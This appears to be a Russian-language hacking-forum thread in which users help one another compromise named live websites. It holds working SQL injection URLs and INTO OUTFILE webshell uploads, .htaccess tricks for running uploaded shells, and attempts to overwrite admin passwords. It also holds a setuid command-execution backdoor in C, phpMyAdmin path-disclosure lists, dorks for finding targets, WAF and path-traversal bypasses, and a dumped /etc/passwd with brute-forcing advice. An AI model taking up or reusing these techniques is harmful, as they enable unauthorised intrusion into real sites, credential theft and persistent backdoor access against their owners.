No checkbone?


Code:
http://www.wollatonpirates.co.uk/index.php?option=com_joomleague&func=showNextMatch&p=1

faza02 said:
как это так «дела не меняет?».


в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость

Mihailov Alx said:
в том смысле, что это нельзя эксплуатировать, и быть может это вообще не уязвимость


наркоман шоле? Serafim белым по русски написал вроде:

/showpost.php?p=3117961&postcount=20488

d1v said:
наркоман шоле?
Serafim
белым по русски написал вроде:
/showpost.php?p=3117961&postcount=20488


Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.

Mihailov Alx said:
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.


Согласен

Mihailov Alx said:
Будучи новичком в этом, не зря попросил разъяснения. То, что вы молчите и смотрите свысока не делает вас умнее. Я к примеру, когда понимаю в какой-то области - помогаю, если вижу что человек тупит - не скатываюсь до уровня скотины с оскорблениями, для меня лучше пройти мимо. И то, подобное редкость, в основном подаю руку.


какие оскорбления? ты на прошлой странице написал, что нет ни единого намёка в исходном коде, если ты туда смотрел - ты не мог не заметить вывода. и кто тебе сказал, что тебе обязаны разжёвывать и класть в рот? твоя невнимательность - это только твоя проблема.

Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.

Mihailov Alx said:
Сейчас я понял откуда пошло недопонимание - я использую Google Chrome и поведение кодировок в ссылках там несколько иное, нежели в FF. Соответственно и результат иной. Если бы я раньше это узрел, то не просил пояснений.


во всех браузерах всё выводится совершенно одинаково.

Я сейчас через Canary сижу, ну ладно, суть не в этом.

как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)

UNION SELECT group_concat(`username`,`password`),2,3,4

FROM `jos_users`

если выполнять

SET password='21232f297a57a5a743894a0e4a801fc3'

WHERE id = 62;

то это должно выглядеть так:

/**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62

Поправьте

Mihailov Alx said:
Я сейчас через Canary сижу, ну ладно, суть не в этом.
как я понимаю запрос выглядит так ( синтаксис скорее всего в корне неправильный)
UNION SELECT group_concat(`username`,`password`),2,3,4
FROM `jos_users`
если выполнять
SET password='21232f297a57a5a743894a0e4a801fc3'
WHERE id = 62;
то это должно выглядеть так:
/**/update/**/jos_users/**/SET/**/password='21232f297a57a5a743894a0e4a801fc3'/WHERE/**/id=62
Поправьте


http://forum.antichat.net/thread104591.html

Есть xss на одном ресурсе, не получается определить тип.

Создаю новость, вписываю в тело страницы


alert(document.cookie)


При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!

не подскажите, что за бред с xss?)

mix0x0 said:
Есть xss на одном ресурсе, не получается определить тип.
Создаю новость, вписываю в тело страницы
При обновлении, вылетает пустой алерт. В исходнике не отображается вписанный код. Первая мысль, что это DOM-BASED, но вся соль в том, что я ява-скрипт не вписываю через адресную строку, следовательно мой код где-то сохраняется, но когда после вылета алерта открываю исходник, то эксплойта нет!
не подскажите, что за бред с xss?)


Это DOM BASED

пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка:


Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, postmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.


я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым


AddType application/x-httpd-php .png
AddHandler application/x-httpd-php .png


но при попытки открыть shell.png он просто скачивается.

вообщем я хз что делать...

ребят,подскажите,плз...в какую сторону копать?)...

сканнер показывает blind-sql здесь в параметре mna :

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray[]=male&srch=y&srchsexarray=1&mna=-89

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray[]=male&srch=y&srchsexarray=1&mna=89

здесь ошибка с раскрытием путей:

http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray=male&srch=y&srchsexarray=1

можно ли раскрутить это скулю или это ошибка сканнера?

мел кто дело с SFTcms v 2.0?

Картинки заливаются, но куда, черт ногу сломит =/

Марок said:
мел кто дело с SFTcms v 2.0?
Картинки заливаются, но куда, черт ногу сломит =/


А посмотреть уже залитые картинке не?

подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5

я делаю по 2 запроса одного типа

первый


select 'php_flag engine on
\r
AddType application/x-httpd-php .phtml .jpg .html
\r
AddHandler application/x-httpd-php .phtml .jpg .html' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/.htaccess'


и второй сам шелл


select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.jpg'


оба запроса в одну папку разумеется

всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..

Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет



Что ещё можно залить вместо моего htaccess ?

красавец said:
Что ещё можно залить вместо моего htaccess ?


либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?

красавец said:
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере,
CMS DLE 9,5
я делаю по 2 запроса одного типа
первый
и второй сам шелл
оба запроса в одну папку разумеется
всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено..
Так же html и другие форматы заливаются типа .xss формат но уже
Internal Server Error
кажет


Что ещё можно залить вместо моего htaccess ?


Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно)

Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.php'

d1v said:
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?


мешает то что php не открывается просто так

я пытался разумеется сначало php залить

красавец said:
мешает то что php не открывается просто так
я пытался разумеется сначало php залить


ну попробуй в папку залить хтакес:


RewriteEngine Off


и патом в пхп записаться уже.

d1v said:
ну попробуй в папку залить хтакес:
и патом в пхп записаться уже.



Сделал вот такой запрос


RewriteEngine Off\r
AddType application/x-httpd-php .phtml .jpg .html\r
AddHandler application/x-httpd-php .phtml .jpg .html' from mysql.user into outfile


Всё равно не хочет jpg как php обрабатыватся

простой php тоже не обрабатывается

d1v said:
ну попробуй в папку залить хтакес:
и патом в пхп записаться уже.


согласен.

красавец said:
Сделал вот такой запрос
Всё равно не хочет jpg как php обрабатыватся
простой php тоже не обрабатывается


Слишком мало вводной информации. Что значит не хочет обрабатываться? 500 ошибка, предложение скачать файл или простое отображение кода без его интерпретации?

Заливай .htaccess


PHP:
Options+Indexes

php_flag engine on

AddType application/x-httpd-php.ololo.phtml.jpg.html.php.php3

AddHandler application/x-httpd-php.ololo.phtml.jpg.html.php.php3

Первая строчка позволит тебе шариться по директории из веба, если вдруг у тебя нет такой возможности сейчас, что убыстрит процесс. Потом заливай последовательно в .phtml, .php, .php3

Алгоритм - залился в формат одного вида, смотришь из веба как ведет себя файл(500 ошибка, предложение скачивания, только текст). И так по всем расширениям. От этого уже и нужно отталкиваться, а пока это гадание на кофейной гуще.

Вот если заливаю прямо php файл то сейчас вывалилось 500 (как и раньше)

если jpg то пишет что поврежденное изображение (если открыть в Осле то виден код как будто txt)

если другие форматы то тоже 500

У меня такая проблема , раньше заливал шелл через ftp на сайт все норм было , сейчас мы видим вот такую картину (http://s019.radikal.ru/i603/1204/17/5a14d62435cc.jpg) Что мне делать ? и как обойти ?

Groove said:
У меня такая проблема , раньше заливал шелл через ftp на сайт все норм было , сейчас мы видим вот такую
картину (http://s019.radikal.ru/i603/1204/17/5a14d62435cc.jpg)
Что мне делать ? и как обойти ?


Попробуй AddType application/x-httpd-php .php в .htaccess в данной папке впихнуть. На изображении же четко и ясно видно в чем дело - файл не исполняется а вываливает php-html код как есть на страницу. Значит сие что обработчик типа убрали для данной папки. Если на апаче включена опция, позволяющая серверу перопределяться дочерними правилами .htaccess , то по идее должно сработать. В случае, если базовый конфиг апача или корневой .thaccess задают для данной директории обдуление .php и не позволяют переопределяться для .htaccess то в данной директории скорее всего ничего не сделаешь.

не помогло.

Groove said:
У меня такая проблема , раньше заливал шелл через ftp на сайт все норм было , сейчас мы видим вот такую
картину (http://s019.radikal.ru/i603/1204/17/5a14d62435cc.jpg)
Что мне делать ? и как обойти ?


Проверь, в шелл.php есть теги

Подскажите пожалуйста, как имея шелл на 1 сайте, узнать урлы всех сайтов сервака.

То есть есть доступ в другие папки (сайты), но по названиям не понятно, что это за адреса.

Варианты посмотреть файлы robots, htaccess, configuration, sitemap и найди myphpadmin не предлагать ) Это само собой..

Заранее огромное спасибо!

Какие варианты залития шелла если можно редактировать ячейки бд?

RusPoker74 said:
Подскажите пожалуйста, как имея шелл на 1 сайте, узнать урлы всех сайтов сервака.
То есть есть доступ в другие папки (сайты), но по названиям не понятно, что это за адреса.
Варианты посмотреть файлы robots, htaccess, configuration, sitemap и найди myphpadmin не предлагать ) Это само собой..
Заранее огромное спасибо!


Рутануть сервак или домены на кирилице

kingbeef said:
Рутануть сервак или домены на кирилице


А чуть поподробнее можно? )

Ребят объясните непонятное, есть easymod в phpbb он криптует пасс через функцию crypt_ftp_pass

http://svn2.assembla.com/svn/evilmods/2.0/quickinstall/trunk/store/easymod/admin/em_includes/em_functions.php

И хранит его в бд, НО возникает вопрос, каким макаром тогда конектится скрипт должен быть чистый пасс гдето, нетакли? Как будет он декодировать его при подключении?

shellers said:
Ребят объясните непонятное, есть easymod в phpbb он криптует пасс через функцию crypt_ftp_pass
http://svn2.assembla.com/svn/evilmods/2.0/quickinstall/trunk/store/easymod/admin/em_includes/em_functions.php
И хранит его в бд, НО возникает вопрос, каким макаром тогда конектится скрипт должен быть чистый пасс гдето, нетакли? Как будет он декодировать его при подключении?


Должна быть прописана гдето функция декриптовки и эта вункция декриптуя пасс присваевается переменной, которая в следствии и выполняет конект!

Несколько вопросов.

1) Как сделать так, чтобы фрейм был не только на индексе, но и на остальных разделах сайта? Например, обхватывал еще форум или админскую панель

2) Реально ли залить шелл в WP ( версия 3.3) с правами модератора, то есть в theme_editor не пускает. Остальное вроде все есть.

stan0009 said:
Несколько вопросов.
1) Как сделать так, чтобы фрейм был не только на индексе, но и на остальных разделах сайта? Например, обхватывал еще форум или админскую панель
2) Реально ли залить шелл в WP ( версия 3.3) с правами модератора, то есть в theme_editor не пускает. Остальное вроде все есть.


ответ на 1 вопрос: правь шаблон, если шаблон 1 на всех страницах где используется данный шаб будет твой фрейм.

на второй вопрос: думаю что нет, права админа нужны

Подскажите, пожалуйста, дорк для поиска WP блогов.

Cock3r said:
Подскажите, пожалуйста, дорк для поиска WP блогов.


"/wp-login.php"

OxoTnik said:
"/wp-login.php"


сам-то пробовал вбивать?мусора много, такая же ситуация и с inurl:wp-content

Cock3r said:
Подскажите, пожалуйста, дорк для поиска WP блогов.


Хотя бы так

inurl:"?author=admin"


Cock3r said:
сам-то пробовал вбивать?мусора много, такая же ситуация и с inurl:wp-content


Человек тебе хотел помочь.

Ereee said:
Хотя бы так
inurl:"?author=admin"
Человек тебе хотел помочь.


А если автор не админ? Ну зарегал себе ник другой?

Code:
inurl:"wp-login.php?action=register"
inurl:"plugins/wp-forum"
"index of /" wp-forum

Хотя бы так...

такой вопрос. Есть база мыльников(1кк, микс). На что её можно чекнуть? ICQ, steam,origin, twitter, facebook чекнуты. Мб есть что ещё?

Cock3r said:
Подскажите, пожалуйста, дорк для поиска WP блогов.


"powered by wordpress"

же

попугай said:
"powered by wordpress"
же


Дык, затерают же часто.

Скомпилируйте суидник на FreeBSD:


Code:
#include
#include
main(int argc, char *argv[]) {
if(argc == 3){
if(strcmp(argv[1],"cool_pass") == 0){
setgid(310);
setuid(16745);
system(argv[2]);
}
}
return 0;
}

Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?

попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться...

P.S: вот список дефолтных логов можешь тут взглянуть /thread49775-default.html

еще также может гугл помочь с раскрытием путей попробуй дорк такого плана


site:test1.ru "mysql_"

ищи phpinfo

или

запросы которые могут привести к раскрытию путей


Code:
Full path disclosure :
/sсriрts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&tbl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)

heJiZzZ said:
Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?


Чаще:

/etc/conf/httpd/httpd.conf

Пытаюсь залить шелл средствами MySQL след. образом:


http://www.jcbi.ru/obzor/obzor.php?id=181-9.999+union+select+"",2,3,4,5,6,7,8,9+INTO+OUTFILE+"/var/www/html/jcbi/docs/c.php"+--


Выдает такую ошибку:


Error!
SELECT * FROM bazes WHERE baze_id=181-9.999 union select "",2,3,4,5,6,7,8,9 INTO OUTFILE "/var/www/html/jcbi/docs/c.php" --



Путь /var/www/html/jcbi/docs/ точно существует.

Помогите, пожалуйста, разобраться.

Т.е вот так нужно проверять?


http://www.jcbi.ru/obzor/obzor.php?id=181-9.999+union+select+File_Priv,2,3,4,5,6,7,8,9+from+ mysql.user--


Там такая же ошибка вылазит...

Кстати, подскажите, что значит вот это: ""?

Почему именно параметр 'cmd'?

Кстати, подскажите, что значит вот это: ""?


Да пофигу как называть)

Код переданный через cmd выполниться в системе.

mironich said:
Да пофигу как называть)
Код переданный через cmd выполниться в системе.


Ага, только щас system() не в моде, через него php-код не выполнишь(в некоторых случаях эта ф-я даже отключена).

Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше?


Ereee said:
Ага, только щас system() не в моде, через него php-код не выполнишь(в некоторых случаях эта ф-я даже отключена).


Что в моде?) Через админку только?

skier529 said:
Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше?


/thread191917-easy+shell.html

И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.

Просто на глаза ничего подобного еще не попадалось.

skier529 said:
И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.
Просто на глаза ничего подобного еще не попадалось.


Исчи баги с раскрытием пути под твой двиг, попробуй вызвать ошибку, глянь мб errrorlog криво лежит, пройдись гуглом по сайту.

skier529 said:
И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.
Просто на глаза ничего подобного еще не попадалось.


Смотрите в сторону 'Path Disclosure'

раз (https://antichat.live/threads/30632/)

два (http://www.xakep.ru/post/36176/default.asp)

skier529 said:
Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше?
Что в моде?) Через админку только?


В этом сезоне многие кутюрье, помимо , который не всегда работает из-за отключенной функции system();, как верно подметил уважаемый Ereee, советуют носить бэкдоры следующего фасона:

Можно добавить еще функции exec(), shell_exec()

Помогите мне пожалуйста покажите мне где среди этого всего пароль юзера для подключения по ftp hsplusdesignbe:x:3456:101::/var/www/html:/ftponly sphera_pop:x:3456:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown:/sbin: halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0perator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: gdm:x:42:42::/home/gdm: xfs:x:43:43:X Font Server:/etc/X11/fs: nobody:x:99:99:Nobody:/: ftp:x:3456:101::/ftp/pub/anonymous:/ftponly info:x:3456:101::/ftp/pub/info:/ftponly tsjaark:x:3456:101::/var/www/html/tsjaark:/ftponly test:x:3456:101::/ftp/pub/test:/ftponly

тут нет паролей это ты просто прочитал /etc/passwd

Faaax said:
тут нет паролей это ты просто прочитал /etc/passwd


А что вообще из этого полезного можно извлечь?

Facecontrol, у тебя есть читалка файлов на сервере (или как ты его получил?). Можешь почитать конфиги апача/сайта и т.д. Если это инклуд, то можешь исполнять свой код (возможно). Почитай об инклуде тут: _http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

AlexPage said:
Facecontrol, у тебя есть читалка файлов на сервере (или как ты его получил?). Можешь почитать конфиги апача/сайта и т.д. Если это инклуд, то можешь исполнять свой код (возможно). Почитай об инклуде тут: _http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/


Я с помощью SQL-inj прочитал этот файл

Facecontrol, чтобы читать файлы сайта (т.е. исходники PHP, в т.ч. и конфиги) тебе нужно узнать внутренний путь сайта. Если кавычки не фильтруются, то можно попробовать залить шелл (опять же зная внутренний путь).

Facecontrol said:
А что вообще из этого полезного можно извлечь?


отпарсить логины, взять хороший словарик и брутить.

есть варианты раскрутить скуль если на серве ssl шифрование и ошибки отключены?

boortyhuhtyu said:
есть варианты раскрутить скуль если на серве ssl шифрование и ошибки отключены?


а чем ssl Может мешать твоей скуле?

ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно

Konqi said:
а чем ssl Может мешать твоей скуле?
ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно


ну я впринцепи хотел услышать ответ только о ssl.спасибо ;_)

посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.

d1v said:
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.


Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. (http://ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf) Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.

Га-Ноцри said:
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из
этой методички. (http://ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf)
Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.


я ведь написал - ЛЮБОЕ наличие оператора приводит к редиректу. все тривиальные методы испробованы.

d1v said:
я ведь написал - ЛЮБОЕ наличие оператор приводит к редиректу. все тривиальные методы испробованы.


Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.

Пациент:

Fiile_priv Y + доступ к PhpInfo.

Пробовал залить мини-шелл след образом:


http://www.aviel.ru/txt/new.php?id=32270-9.999+union+select+1,'',3,4,5,6,7,8,9,10,11+from+m ysql.user+into+outfile+'/usr/local/www/aviel/www/txt/images/s.php'--


Выдает ошибку:


К сожалению, запрошеннaя Вами статья в настоящее время недоступна.


ЧТо можно с ним сделать?

P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример.

P.S1 эх, первый шелл был так близок =((...

Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.

skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп...

Пример:


Code:
http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+

как получить список пользователей wordpress?без админки

Cock3r said:
как получить список пользователей wordpress?без админки


если есть скуль,то раскручивать ее до инфы с таблицы wp_users

Compton said:
если есть скуль,то раскручивать ее до инфы с таблицы wp_users


а если нету?

Вы хотите без уязвимости сделать дамп БД? Извините, Вы не маг случайно?

Есть инклуд, есть ава, есть ошибка, по которой виден путь.

Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.

Это Mod rewrite шалит?

Как понять что за фигня?

Это Mod rewrite шалит?


мод реврайт не действует для инклудов


Но ава почему-то не инклудится, хотя другие картинки инклудятся. Все вроде на 1-м сервере.


ну вот наверное не на 1 сервере, или что то не правильно делаешь, чтобы наверняка найди настройки апача и посмотри есть ли там такой хост


Как понять что за фигня?


если сам не можешь, выложи, что гадать то, мож и поможет кто

Раскручиваю sql- иньекцию.

Наугад нашел таблицу games.

Запрос вида:


game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+games--


работает.

Запрос типа:


game.php?gameid=-1+union+select+1,2,3,4,5,6,7,8+FROM+jos_users--


не работает.

Хотя таблицу games в БД я найти не могу. А таблицу jos_users - могу найти. но вывести данные не получается.


game.php?gameid=-1+union+select+1,UNHEX(HEX(COLUMN_NAME)),3,4,5,6,7 ,8+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E=0x6a6f735f7573657273+LIMIT+2,1%20--


- срабатывает.

Подозреваю на фильтрацию или некорректную кодировку в базе данных.

Вопрос, как можно будет зафильтровать jos_users, чтобы можно было делать запросы и выводить данные из логина-паролей типа:


PHP:
game.php?gameid=-1+union+select+1,concat_ws(0x03a,id,username,passw ord),3,4,5,6,7,8+FROM+jos_users--

А я подозреваю что таблица в другой бд

Если в таком случае - как правильно создать запрос для вывода данных из другой базы данных?

to Muracha


PHP:
game.php?gameid=-1+union+select+1,concat_ws(0x03a,id,username,passw ord),3,4,5,6,7,8+FROM+anotherdb.jos_users--

Для вывода таблиц из другой базы данных


PHP:
select table_name from information_schema.table s where table_schema='anotherdb'limit 0,1;

Так же делаем с колонками


PHP:
select column_name from information_schema.colu mns where table_name='jos_users'andtable_schema= 'anotherdb'limit 0,1;

Не знаю туда или нет, но все-таки спрошу:

Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.

В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.

Вопрос в том как этот файл запустить.

P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.

Существует ли альтернатива для поднятия на директорию выше?


Code:
/../
\..\
/..\
\../

^^ фильтруются

Подняться на одну могу через ../ Выше никак.

Выдаёт:


Code:
Forbidden

You don't have permission to access /script.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Не знаю туда или нет, но все-таки спрошу:
Есть доступ к админке, там есть возможность заливки pdf файла. В итоге файл получает ссылку вида http://shell.com/download.php?id=418.
В БД никаких упоминай о файле... По крайней мере в данных к которым у меня есть доступ.
Вопрос в том как этот файл запустить.
P.S По этой ссылке выдает ошибку "Не удалось загрузить документ PDF.


Не как, надо грузить на серв(ИЩИ В АДМИНКЕ НАСТРОЙКИ ЗАГРУЗКИ).


Выше никак.


Прав не хватает?

to TorRom

Может быть WAF? Как вариант

mironich said:
Прав не хватает?


Я не так далеко лезу. Должно хватать. Не выше корня сайта.


cat1vo said:
to
TorRom
Может быть WAF? Как вариант


Да, это WAF. Проверил, если запрос содержит:


Code:
union
#00
alert(

Получаем 403 Forbidden

allow_url_include=on по всей видимости, фишка с data не работает. Есть ещё способы?

Можно ли Залить шелл на ipb 3.6.x ? Есть доступ к админке

to --=[Bob]=--

Последняя версия — IPB 3.3.0 (http://ru.wikipedia.org/wiki/Invision_Power_Board): 21 марта 2012

Вы, ничего не путаете?

Guys. I got version working perfectly.


Code:
http://af-art.be/common/catalog2.php?g_id=3+or+1+group+by+concat_ws%280x7e ,version%28%29,floor%28rand%280%29*2%29%29+having+ min%280%29+or+1--

I cannot grab tables.

lightangel said:
Guys. I got version working perfectly.

Code:
http://af-art.be/common/catalog2.php?g_id=3+or+1+group+by+concat_ws%280x7e ,version%28%29,floor%28rand%280%29*2%29%29+having+ min%280%29+or+1--

I cannot grab tables.


Because there is no `information_schema.table`. Logically, is not it?

But this is version 5.

Only version 4 has no `information_schema.table`.

Code:
Duplicate entry '3.23.58~1' for key 1

http://af-art.be/common/catalog2.php?g_id=3+and+substring(version(),1,1)li ke(4)
http://af-art.be/common/catalog2.php?g_id=3+and+substring(version(),1,1)li ke(3)

You have 3.23.58 version of MySQL. Information_schema appeared in the 5 version of MySQL

Thank you now, I know it's blind SQL injection.

I will just use Boolean Based on this one.

cat1vo said:
to
--=[Bob]=--
Последняя версия —
IPB 3.3.0 (http://ru.wikipedia.org/wiki/Invision_Power_Board)
: 21 марта 2012
Вы, ничего не путаете?


Сорри, 3.2.3

Нужно както залить шелл. есть доступ к админке...

--=[Bob]=--

Отсюда ничего не подходит? /threadnav89112-1-10.html

Нет..

TorRom said:
Существует ли альтернатива для поднятия на директорию выше?

Code:
/../
\..\
/..\
\../

^^ фильтруются
Подняться на одну могу через
../
Выше никак.
Выдаёт:

Code:
Forbidden

You don't have permission to access /script.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.



Попробуй ....//....//....// или .././.././.././.././.././

Вопрос чайника:

Каким запросом можно обновить данные в ячейке таблицы?

Делал так

35+union+select+1,2,3+from+mysql.user+into+update+ jos_users+set+password+'test'+where+username+'admi n'

и так

35+union+select+1,2,3+from+mysql.user+into+update+ jos_users+set+password='test'+where+username='admi n'

никак не получается.

cipa21,

You have an error SQL syntax. Please, read manuals

35+union+select+1,2,3+from+mysql.user+into+update+ jos_users+set+password+'test'+where+username+'admi n'

1. Синтаксис не правильный.

2. В MYSQL не выполнишь 2 запроса этим ";".

3. С Днем Победы =) Желаю тебе побед!

Ereee said:
cipa21
,
You have an error SQL syntax. Please, read manuals
35+union+
select
+1,2,3+from+mysql.user+into+
update
+ jos_users+set+password+'test'+where+username+'admi n'
1. Синтаксис не правильный.
2. В MYSQL не выполнишь 2 запроса этим ";".
3. С Днем Победы =) Желаю тебе побед!


Остроумно!

Я и без вас знаю что не правильный, иначе не писал бы тут....

to cipa21

Вам же MySQL сказал, учите мануалы. UPDATE нельзя выполнить в SELECT запросе!

З.Ы. INTO UPDATE - первый раз такое вижу

cipa21 said:
Остроумно!
Я и без вас знаю что не правильный, иначе не писал бы тут....


В одном mysql запросе у тебя не получится и SELECT и UPDATE выполнить.

Поставлю вопрос иначе... Можно как-то сменить пароль админа через строку(см. выше)?

cipa21 said:
Поставлю вопрос иначе... Можно как-то сменить пароль админа через строку(см. выше)?


Нет! Только посмотреть.

to cipa21

Можно если уязвимый запрос будет INSERT или UPDATE, но не SELECT, как в Вашем случае!

Как-то все очень печально вы объясняете... Я обратился за помощью, мне в ответ куча "читай мануалы" , "нет нельзя" и т.д.

А не проще ли ответить: "Нет, невозможно таким макаром никак изменить данные таблицы" или "да возможно, и выложить реализацию".

cipa21 said:
Как-то все очень печально вы объясняете... Я обратился за помощью, мне в ответ куча "читай мануалы" , "нет нельзя" и т.д.
